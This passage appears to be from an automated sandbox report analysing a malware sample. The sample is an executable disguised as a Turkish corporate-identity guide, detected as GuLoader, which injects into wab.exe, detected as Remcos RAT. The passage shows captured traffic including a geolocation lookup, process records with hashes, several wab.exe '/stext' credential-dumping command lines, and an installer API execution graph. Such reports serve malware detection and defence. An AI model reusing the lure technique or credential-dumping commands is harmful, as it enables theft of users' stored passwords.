                                                                                                                                                                                        Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209302902 CET29INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                                                                        Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


Session ID: 1
Source IP: 192.168.11.20
Source Port: 50096
Destination IP: 178.237.33.50
Destination Port: 80
Process: C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp: Oct 30, 2023 14:17:53.285733938 CET
kBytes transferred: 541
Direction: OUT
Data:
GET /json.gp HTTP/1.1
                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                        Cache-Control: no-cache

Timestamp: Oct 30, 2023 14:17:53.539247036 CET
kBytes transferred: 547
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                        date: Mon, 30 Oct 2023 13:17:53 GMT
                                                                                                                                                                                        server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                        content-length: 958
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:14:17:26
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:740'313 bytes
                                                                                                                                                                                        MD5 hash:F6CBF303899397B7D28E19930D48627D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:14:17:35
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:21.4%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:19.7%
                                                                                                                                                                                          Total number of Nodes:1548
                                                                                                                                                                                          Total number of Limit Nodes:40
4410->4411 4412 4039c4 4411->4412 4413 4039d6 4411->4413 4515 406201 wsprintfW 4412->4515 4414 406188 3 API calls 4413->4414 4415 403a06 4414->4415 4416 403a25 lstrcatW 4415->4416 4418 406188 3 API calls 4415->4418 4419 4039d4 4416->4419 4418->4416 4507 403c80 4419->4507 4422 405c97 18 API calls 4423 403a57 4422->4423 4424 403aeb 4423->4424 4426 406188 3 API calls 4423->4426 4425 405c97 18 API calls 4424->4425 4427 403af1 4425->4427 4428 403a89 4426->4428 4429 403b01 LoadImageW 4427->4429 4432 4062dc 17 API calls 4427->4432 4428->4424 4435 403aaa lstrlenW 4428->4435 4439 405bbc CharNextW 4428->4439 4430 403ba7 4429->4430 4431 403b28 RegisterClassW 4429->4431 4434 40140b 2 API calls 4430->4434 4433 403b5e SystemParametersInfoW CreateWindowExW 4431->4433 4464 403bb1 4431->4464 4432->4429 4433->4430 4438 403bad 4434->4438 4436 403ab8 lstrcmpiW 4435->4436 4437 403ade 4435->4437 4436->4437 4440 403ac8 GetFileAttributesW 4436->4440 4441 405b8f 3 API calls 4437->4441 4444 403c80 18 API calls 4438->4444 4438->4464 4442 403aa7 4439->4442 4443 403ad4 4440->4443 4445 403ae4 4441->4445 4442->4435 4443->4437 4446 405bdb 2 API calls 4443->4446 4447 403bbe 4444->4447 4516 4062ba lstrcpynW 4445->4516 4446->4437 4449 403bca ShowWindow 4447->4449 4450 403c4d 4447->4450 4452 406624 3 API calls 4449->4452 4517 4053f5 OleInitialize 4450->4517 4454 403be2 4452->4454 4453 403c53 4455 403c57 4453->4455 4456 403c6f 4453->4456 4457 403bf0 GetClassInfoW 4454->4457 4459 406624 3 API calls 4454->4459 4463 40140b 2 API calls 4455->4463 4455->4464 4458 40140b 2 API calls 4456->4458 4460 403c04 GetClassInfoW RegisterClassW 4457->4460 4461 403c1a DialogBoxParamW 4457->4461 4458->4464 4459->4457 4460->4461 4462 40140b 2 API calls 4461->4462 4462->4464 4463->4464 4464->4364 4465->4314 4466->4345 4467->4353 4469 4038e8 4468->4469 4470 4038da CloseHandle 4468->4470 4535 403915 4469->4535 4470->4469 4473 4059cc 67 API calls 4474 403703 OleUninitialize 4473->4474 4474->4320 4474->4321 4475->4354 
4476->4366 4478 4058e2 4477->4478 4479 4058d6 CloseHandle 4477->4479 4478->4366 4479->4478 4481 401389 2 API calls 4480->4481 4482 401420 4481->4482 4482->4323 4484 405dec GetTickCount GetTempFileNameW 4483->4484 4485 405e22 4484->4485 4486 40338d 4484->4486 4485->4484 4485->4486 4486->4301 4487->4383 4488->4386 4489->4390 4491 402e82 4490->4491 4492 402e9a 4490->4492 4493 402e92 4491->4493 4494 402e8b DestroyWindow 4491->4494 4495 402ea2 4492->4495 4496 402eaa GetTickCount 4492->4496 4493->4393 4494->4493 4503 4066d0 4495->4503 4498 402eb8 CreateDialogParamW ShowWindow 4496->4498 4499 402edb 4496->4499 4498->4499 4499->4393 4501->4398 4502->4400 4504 4066ed PeekMessageW 4503->4504 4505 4066e3 DispatchMessageW 4504->4505 4506 402ea8 4504->4506 4505->4504 4506->4393 4508 403c94 4507->4508 4524 406201 wsprintfW 4508->4524 4510 403d05 4525 403d39 4510->4525 4512 403a35 4512->4422 4513 403d0a 4513->4512 4514 4062dc 17 API calls 4513->4514 4514->4513 4515->4419 4516->4424 4528 40427d 4517->4528 4519 405418 4523 40543f 4519->4523 4531 401389 4519->4531 4520 40427d SendMessageW 4521 405451 OleUninitialize 4520->4521 4521->4453 4523->4520 4524->4510 4526 4062dc 17 API calls 4525->4526 4527 403d47 SetWindowTextW 4526->4527 4527->4513 4529 404295 4528->4529 4530 404286 SendMessageW 4528->4530 4529->4519 4530->4529 4533 401390 4531->4533 4532 4013fe 4532->4519 4533->4532 4534 4013cb MulDiv SendMessageW 4533->4534 4534->4533 4536 403923 4535->4536 4537 4038ed 4536->4537 4538 403928 FreeLibrary GlobalFree 4536->4538 4537->4473 4538->4537 4538->4538 5352 40190f 5353 402c41 17 API calls 5352->5353 5354 401916 5353->5354 5355 405920 MessageBoxIndirectW 5354->5355 5356 40191f 5355->5356 5357 6f3d166d 5358 6f3d1516 GlobalFree 5357->5358 5359 6f3d1685 5358->5359 5360 6f3d16cb GlobalFree 5359->5360 5361 6f3d16a0 5359->5361 5362 6f3d16b7 VirtualFree 5359->5362 5361->5360 5362->5360 5363 401491 5364 405322 24 API calls 5363->5364 5365 401498 5364->5365 5366 401d14 5367 402c1f 17 API 
calls 5366->5367 5368 401d1b 5367->5368 5369 402c1f 17 API calls 5368->5369 5370 401d27 GetDlgItem 5369->5370 5371 402592 5370->5371 4730 405296 4731 4052a6 4730->4731 4732 4052ba 4730->4732 4733 4052ac 4731->4733 4743 405303 4731->4743 4734 4052c2 IsWindowVisible 4732->4734 4735 4052e2 4732->4735 4737 40427d SendMessageW 4733->4737 4738 4052cf 4734->4738 4734->4743 4736 405308 CallWindowProcW 4735->4736 4749 404c6c 4735->4749 4739 4052b6 4736->4739 4737->4739 4744 404bec SendMessageW 4738->4744 4743->4736 4745 404c4b SendMessageW 4744->4745 4746 404c0f GetMessagePos ScreenToClient SendMessageW 4744->4746 4747 404c43 4745->4747 4746->4747 4748 404c48 4746->4748 4747->4735 4748->4745 4758 4062ba lstrcpynW 4749->4758 4751 404c7f 4759 406201 wsprintfW 4751->4759 4753 404c89 4754 40140b 2 API calls 4753->4754 4755 404c92 4754->4755 4760 4062ba lstrcpynW 4755->4760 4757 404c99 4757->4743 4758->4751 4759->4753 4760->4757 5372 402598 5373 4025c7 5372->5373 5374 4025ac 5372->5374 5375 4025fb 5373->5375 5376 4025cc 5373->5376 5377 402c1f 17 API calls 5374->5377 5379 402c41 17 API calls 5375->5379 5378 402c41 17 API calls 5376->5378 5384 4025b3 5377->5384 5380 4025d3 WideCharToMultiByte lstrlenA 5378->5380 5381 402602 lstrlenW 5379->5381 5380->5384 5381->5384 5382 40262f 5383 402645 5382->5383 5385 405e62 WriteFile 5382->5385 5384->5382 5384->5383 5386 405e91 5 API calls 5384->5386 5385->5383 5386->5382 5387 6f3d10e1 5396 6f3d1111 5387->5396 5388 6f3d11d8 GlobalFree 5389 6f3d12ba 2 API calls 5389->5396 5390 6f3d11d3 5390->5388 5391 6f3d11f8 GlobalFree 5391->5396 5392 6f3d1272 2 API calls 5395 6f3d11c4 GlobalFree 5392->5395 5393 6f3d1164 GlobalAlloc 5393->5396 5394 6f3d12e1 lstrcpyW 5394->5396 5395->5396 5396->5388 5396->5389 5396->5390 5396->5391 5396->5392 5396->5393 5396->5394 5396->5395 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 SendMessageW 4897->4899 4900 404d9c 4898->4900 
4899->4898 4902 404dab 4900->4902 4903 404dd3 4900->4903 4901 404fed 4908 405099 4901->4908 4914 405281 4901->4914 4915 405046 SendMessageW 4901->4915 4904 4062dc 17 API calls 4902->4904 4907 404231 18 API calls 4903->4907 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4901 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4901 4917 404fdf SendMessageW 4906->4917 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4918 4050d4 4911->4918 4924 4050c4 4911->4924 4925 4050bd ImageList_Destroy 4911->4925 4919 404bec 5 API calls 4912->4919 4920 404231 18 API calls 4913->4920 4916 404298 8 API calls 4914->4916 4915->4914 4922 40505b SendMessageW 4915->4922 4923 40528f 4916->4923 4917->4901 4921 405243 4918->4921 4942 404c6c 4 API calls 4918->4942 4947 40510f 4918->4947 4941 404f7a 4919->4941 4928 404df5 4920->4928 4921->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4921->4930 4929 40506e 4922->4929 4924->4918 4926 4050cd GlobalFree 4924->4926 4925->4924 4926->4918 4927 404eca GetWindowLongW SetWindowLongW 4931 404ee3 4927->4931 4928->4927 4934 404e45 SendMessageW 4928->4934 4936 404ec4 4928->4936 4939 404e81 SendMessageW 4928->4939 4940 404e92 SendMessageW 4928->4940 4935 40507f SendMessageW 4929->4935 4930->4914 4932 404f01 4931->4932 4933 404ee9 ShowWindow 4931->4933 4953 404266 SendMessageW 4932->4953 4952 404266 SendMessageW 4933->4952 4934->4928 4935->4908 4936->4927 4936->4931 4939->4928 4940->4928 4941->4906 4942->4947 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4921 4945 40522f 4944->4945 4954 404ba7 4945->4954 4946 40513d SendMessageW 4948 405153 4946->4948 4947->4946 4947->4948 4948->4944 4949 4051b4 4948->4949 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4951 4951->4948 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4921 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 17 API calls 4960->4961 4962 404b66 4961->4962 
4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 4964->4956 5397 40149e 5398 4014ac PostQuitMessage 5397->5398 5399 4022f7 5397->5399 5398->5399 5400 401c1f 5401 402c1f 17 API calls 5400->5401 5402 401c26 5401->5402 5403 402c1f 17 API calls 5402->5403 5404 401c33 5403->5404 5405 402c41 17 API calls 5404->5405 5408 401c48 5404->5408 5405->5408 5406 401c63 5411 402c1f 17 API calls 5406->5411 5407 401caf 5412 402c41 17 API calls 5407->5412 5409 402c41 17 API calls 5408->5409 5410 401c58 5408->5410 5409->5410 5410->5406 5410->5407 5413 401c68 5411->5413 5414 401cb4 5412->5414 5415 402c1f 17 API calls 5413->5415 5416 402c41 17 API calls 5414->5416 5417 401c74 5415->5417 5418 401cbd FindWindowExW 5416->5418 5419 401c81 SendMessageTimeoutW 5417->5419 5420 401c9f SendMessageW 5417->5420 5421 401cdf 5418->5421 5419->5421 5420->5421 5422 402aa0 SendMessageW 5423 402ac5 5422->5423 5424 402aba InvalidateRect 5422->5424 5424->5423 5425 402821 5426 402827 5425->5426 5427 402ac5 5426->5427 5428 40282f FindClose 5426->5428 5428->5427 5429 4043a1 lstrlenW 5430 4043c0 5429->5430 5431 4043c2 WideCharToMultiByte 5429->5431 5430->5431 5432 404722 5433 40474e 5432->5433 5434 40475f 5432->5434 5493 405904 GetDlgItemTextW 5433->5493 5436 40476b GetDlgItem 5434->5436 5441 4047ca 5434->5441 5439 40477f 5436->5439 5437 4048ae 5442 404a5d 5437->5442 5495 405904 GetDlgItemTextW 5437->5495 5438 404759 5440 40654e 5 API calls 5438->5440 5444 404793 SetWindowTextW 5439->5444 5445 405c3a 4 API calls 5439->5445 5440->5434 5441->5437 5441->5442 5446 4062dc 17 API calls 5441->5446 5449 404298 8 API calls 5442->5449 5448 404231 18 API calls 5444->5448 5450 404789 5445->5450 5451 40483e SHBrowseForFolderW 5446->5451 5447 4048de 5452 405c97 18 API calls 5447->5452 5453 4047af 5448->5453 5454 404a71 5449->5454 5450->5444 5458 405b8f 3 API calls 5450->5458 5451->5437 5455 404856 CoTaskMemFree 5451->5455 5456 4048e4 5452->5456 5457 404231 18 API calls 5453->5457 
5459 405b8f 3 API calls 5455->5459 5496 4062ba lstrcpynW 5456->5496 5460 4047bd 5457->5460 5458->5444 5461 404863 5459->5461 5494 404266 SendMessageW 5460->5494 5464 40489a SetDlgItemTextW 5461->5464 5469 4062dc 17 API calls 5461->5469 5464->5437 5465 4047c3 5467 406694 5 API calls 5465->5467 5466 4048fb 5468 406694 5 API calls 5466->5468 5467->5441 5475 404902 5468->5475 5470 404882 lstrcmpiW 5469->5470 5470->5464 5473 404893 lstrcatW 5470->5473 5471 404943 5497 4062ba lstrcpynW 5471->5497 5473->5464 5474 40494a 5476 405c3a 4 API calls 5474->5476 5475->5471 5479 405bdb 2 API calls 5475->5479 5481 40499b 5475->5481 5477 404950 GetDiskFreeSpaceW 5476->5477 5480 404974 MulDiv 5477->5480 5477->5481 5479->5475 5480->5481 5482 404a0c 5481->5482 5484 404ba7 20 API calls 5481->5484 5483 404a2f 5482->5483 5485 40140b 2 API calls 5482->5485 5498 404253 EnableWindow 5483->5498 5486 4049f9 5484->5486 5485->5483 5488 404a0e SetDlgItemTextW 5486->5488 5489 4049fe 5486->5489 5488->5482 5491 404ade 20 API calls 5489->5491 5490 404a4b 5490->5442 5492 40467b SendMessageW 5490->5492 5491->5482 5492->5442 5493->5438 5494->5465 5495->5447 5496->5466 5497->5474 5498->5490 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5499 6f3d18d9 5500 6f3d18fc 5499->5500 5501 6f3d1931 GlobalFree 5500->5501 5502 6f3d1943 5500->5502 5501->5502 5503 6f3d1272 2 API calls 5502->5503 5504 6f3d1ace GlobalFree GlobalFree 5503->5504 5505 6f3d1058 5507 6f3d1074 5505->5507 5506 6f3d10dd 5507->5506 5508 6f3d1516 GlobalFree 5507->5508 5509 6f3d1092 5507->5509 5508->5509 5510 6f3d1516 GlobalFree 5509->5510 5511 6f3d10a2 5510->5511 5512 6f3d10a9 GlobalSize 5511->5512 5513 6f3d10b2 5511->5513 5512->5513 5514 6f3d10c7 5513->5514 5515 6f3d10b6 GlobalAlloc 5513->5515 5517 6f3d10d2 GlobalFree 5514->5517 5516 6f3d153d 3 API calls 5515->5516 5516->5514 5517->5506 5518 6f3d16d4 5519 6f3d1703 5518->5519 5520 6f3d1b5f 22 API calls 5519->5520 5521 6f3d170a 
5520->5521 5522 6f3d171d 5521->5522 5523 6f3d1711 5521->5523 5525 6f3d1744 5522->5525 5526 6f3d1727 5522->5526 5524 6f3d1272 2 API calls 5523->5524 5527 6f3d171b 5524->5527 5529 6f3d176e 5525->5529 5530 6f3d174a 5525->5530 5528 6f3d153d 3 API calls 5526->5528 5532 6f3d172c 5528->5532 5531 6f3d153d 3 API calls 5529->5531 5533 6f3d15b4 3 API calls 5530->5533 5531->5527 5534 6f3d15b4 3 API calls 5532->5534 5535 6f3d174f 5533->5535 5536 6f3d1732 5534->5536 5537 6f3d1272 2 API calls 5535->5537 5538 6f3d1272 2 API calls 5536->5538 5539 6f3d1755 GlobalFree 5537->5539 5541 6f3d1738 GlobalFree 5538->5541 5539->5527 5540 6f3d1769 GlobalFree 5539->5540 5540->5527 5541->5527 5542 6f3d2c57 5543 6f3d2c6f 5542->5543 5544 6f3d158f 2 API calls 5543->5544 5545 6f3d2c8a 5544->5545 5546 4028ad 5547 402c41 17 API calls 5546->5547 5549 4028bb 5547->5549 5548 4028d1 5551 405d8b 2 API calls 5548->5551 5549->5548 5550 402c41 17 API calls 5549->5550 5550->5548 5552 4028d7 5551->5552 5574 405db0 GetFileAttributesW CreateFileW 5552->5574 5554 4028e4 5555 4028f0 GlobalAlloc 5554->5555 5556 402987 5554->5556 5557 402909 5555->5557 5558 40297e CloseHandle 5555->5558 5559 4029a2 5556->5559 5560 40298f DeleteFileW 5556->5560 5575 403347 SetFilePointer 5557->5575 5558->5556 5560->5559 5562 40290f 5563 403331 ReadFile 5562->5563 5564 402918 GlobalAlloc 5563->5564 5565 402928 5564->5565 5566 40295c 5564->5566 5568 403116 31 API calls 5565->5568 5567 405e62 WriteFile 5566->5567 5569 402968 GlobalFree 5567->5569 5573 402935 5568->5573 5570 403116 31 API calls 5569->5570 5572 40297b 5570->5572 5571 402953 GlobalFree 5571->5566 5572->5558 5573->5571 5574->5554 5575->5562 5576 401a30 5577 402c41 17 API calls 5576->5577 5578 401a39 ExpandEnvironmentStringsW 5577->5578 5579 401a4d 5578->5579 5581 401a60 5578->5581 5580 401a52 lstrcmpW 5579->5580 5579->5581 5580->5581 4539 402032 4540 402044 4539->4540 4541 4020f6 4539->4541 4542 402c41 17 API calls 4540->4542 4543 401423 24 API calls 4541->4543 4544 40204b 
4542->4544 4550 402250 4543->4550 4545 402c41 17 API calls 4544->4545 4546 402054 4545->4546 4547 40206a LoadLibraryExW 4546->4547 4548 40205c GetModuleHandleW 4546->4548 4547->4541 4549 40207b 4547->4549 4548->4547 4548->4549 4562 406703 WideCharToMultiByte 4549->4562 4553 4020c5 4555 405322 24 API calls 4553->4555 4554 40208c 4556 402094 4554->4556 4557 4020ab 4554->4557 4558 40209c 4555->4558 4559 401423 24 API calls 4556->4559 4565 6f3d1777 4557->4565 4558->4550 4560 4020e8 FreeLibrary 4558->4560 4559->4558 4560->4550 4563 40672d GetProcAddress 4562->4563 4564 402086 4562->4564 4563->4564 4564->4553 4564->4554 4566 6f3d17aa 4565->4566 4607 6f3d1b5f 4566->4607 4568 6f3d17b1 4569 6f3d18d6 4568->4569 4570 6f3d17c9 4568->4570 4571 6f3d17c2 4568->4571 4569->4558 4641 6f3d2394 4570->4641 4657 6f3d2352 4571->4657 4576 6f3d182d 4581 6f3d187e 4576->4581 4582 6f3d1833 4576->4582 4577 6f3d180f 4670 6f3d2569 4577->4670 4578 6f3d17df 4580 6f3d17e5 4578->4580 4585 6f3d17f0 4578->4585 4579 6f3d17f8 4591 6f3d17ee 4579->4591 4667 6f3d2d37 4579->4667 4580->4591 4651 6f3d2aac 4580->4651 4589 6f3d2569 10 API calls 4581->4589 4689 6f3d15c6 4582->4689 4584 6f3d1815 4681 6f3d15b4 4584->4681 4661 6f3d2724 4585->4661 4594 6f3d186f 4589->4594 4591->4576 4591->4577 4599 6f3d18c5 4594->4599 4695 6f3d252c 4594->4695 4596 6f3d17f6 4596->4591 4597 6f3d2569 10 API calls 4597->4594 4599->4569 4602 6f3d18cf GlobalFree 4599->4602 4602->4569 4604 6f3d18b1 4604->4599 4699 6f3d153d wsprintfW 4604->4699 4605 6f3d18aa FreeLibrary 4605->4604 4702 6f3d121b GlobalAlloc 4607->4702 4609 6f3d1b83 4703 6f3d121b GlobalAlloc 4609->4703 4611 6f3d1da9 GlobalFree GlobalFree GlobalFree 4612 6f3d1dc6 4611->4612 4627 6f3d1e10 4611->4627 4614 6f3d2192 4612->4614 4621 6f3d1ddb 4612->4621 4612->4627 4613 6f3d1c64 GlobalAlloc 4636 6f3d1b8e 4613->4636 4615 6f3d21b4 GetModuleHandleW 4614->4615 4614->4627 4618 6f3d21da 4615->4618 4619 6f3d21c5 LoadLibraryW 4615->4619 4616 6f3d1caf lstrcpyW 4620 6f3d1cb9 lstrcpyW 
4616->4620 4617 6f3d1ccd GlobalFree 4617->4636 4710 6f3d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4618->4710 4619->4618 4619->4627 4620->4636 4621->4627 4706 6f3d122c 4621->4706 4623 6f3d222c 4625 6f3d2239 lstrlenW 4623->4625 4623->4627 4711 6f3d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4625->4711 4626 6f3d2064 4709 6f3d121b GlobalAlloc 4626->4709 4627->4568 4628 6f3d21ec 4628->4623 4639 6f3d2216 GetProcAddress 4628->4639 4629 6f3d20ec 4629->4627 4634 6f3d2134 lstrcpyW 4629->4634 4632 6f3d1d0b 4632->4636 4704 6f3d158f GlobalSize GlobalAlloc 4632->4704 4633 6f3d1fa5 GlobalFree 4633->4636 4634->4627 4635 6f3d2253 4635->4627 4636->4611 4636->4613 4636->4616 4636->4617 4636->4620 4636->4626 4636->4627 4636->4629 4636->4632 4636->4633 4637 6f3d122c 2 API calls 4636->4637 4637->4636 4639->4623 4640 6f3d206d 4640->4568 4643 6f3d23ac 4641->4643 4642 6f3d122c GlobalAlloc lstrcpynW 4642->4643 4643->4642 4645 6f3d24d5 GlobalFree 4643->4645 4647 6f3d247f GlobalAlloc CLSIDFromString 4643->4647 4648 6f3d2454 GlobalAlloc WideCharToMultiByte 4643->4648 4650 6f3d249e 4643->4650 4713 6f3d12ba 4643->4713 4645->4643 4646 6f3d17cf 4645->4646 4646->4578 4646->4579 4646->4591 4647->4645 4648->4645 4650->4645 4717 6f3d26b8 4650->4717 4653 6f3d2abe 4651->4653 4652 6f3d2b63 ReadFile 4654 6f3d2b81 4652->4654 4653->4652 4720 6f3d2a56 4654->4720 4656 6f3d2c4d 4656->4591 4658 6f3d2367 4657->4658 4659 6f3d2372 GlobalAlloc 4658->4659 4660 6f3d17c8 4658->4660 4659->4658 4660->4570 4665 6f3d2754 4661->4665 4662 6f3d27ef GlobalAlloc 4666 6f3d2812 4662->4666 4663 6f3d2802 4664 6f3d2808 GlobalSize 4663->4664 4663->4666 4664->4666 4665->4662 4665->4663 4666->4596 4668 6f3d2d42 4667->4668 4669 6f3d2d82 GlobalFree 4668->4669 4724 6f3d121b GlobalAlloc 4670->4724 4672 6f3d25ec MultiByteToWideChar 4678 6f3d2573 4672->4678 4673 6f3d261f lstrcpynW 4673->4678 4674 6f3d260e StringFromGUID2 4674->4678 4675 6f3d2632 wsprintfW 
